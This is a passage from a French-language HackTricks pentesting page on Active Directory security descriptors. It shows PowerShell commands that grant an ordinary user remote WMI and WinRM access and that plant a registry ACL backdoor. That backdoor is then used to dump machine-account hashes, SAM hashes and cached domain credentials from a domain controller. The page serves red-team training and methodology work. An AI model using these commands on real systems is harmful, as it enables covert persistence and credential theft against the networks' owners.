hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md
2023-06-03 13:10:46 +00:00

4.7 KiB
Raw Blame History

Descripteurs de sécurité

Le langage de définition de descripteur de sécurité (SDDL) définit le format utilisé pour décrire un descripteur de sécurité. SDDL utilise des chaînes ACE pour DACL et SACL: type_ace;flags_ace;droits;GUID_objet;GUID_héritage;SID_compte;

Les descripteurs de sécurité sont utilisés pour stocker les permissions qu'un objet a sur un objet. Si vous pouvez simplement apporter une petite modification au descripteur de sécurité d'un objet, vous pouvez obtenir des privilèges très intéressants sur cet objet sans avoir besoin d'être membre d'un groupe privilégié.

Cette technique de persistance est basée sur la capacité à gagner tous les privilèges nécessaires contre certains objets, afin de pouvoir effectuer une tâche qui nécessite généralement des privilèges d'administrateur mais sans avoir besoin d'être administrateur.

Accès à WMI

Vous pouvez donner à un utilisateur l'accès pour exécuter à distance WMI en utilisant ceci:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcnamespace 'root\cimv2' -Remove -Verbose #Remove

Accès à WinRM

Donnez accès à la console PS WinRM à un utilisateur en utilisant ceci:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Accès à distance aux hachages

Accédez au registre et dump les hachages en créant une backdoor Reg en utilisant DAMP, afin que vous puissiez à tout moment récupérer le hachage de l'ordinateur, le SAM et toute information d'identification AD mise en cache sur l'ordinateur. Ainsi, il est très utile de donner cette autorisation à un utilisateur régulier contre un ordinateur contrôleur de domaine :

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Consultez Silver Tickets pour apprendre comment vous pouvez utiliser le hachage du compte d'ordinateur d'un contrôleur de domaine.

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥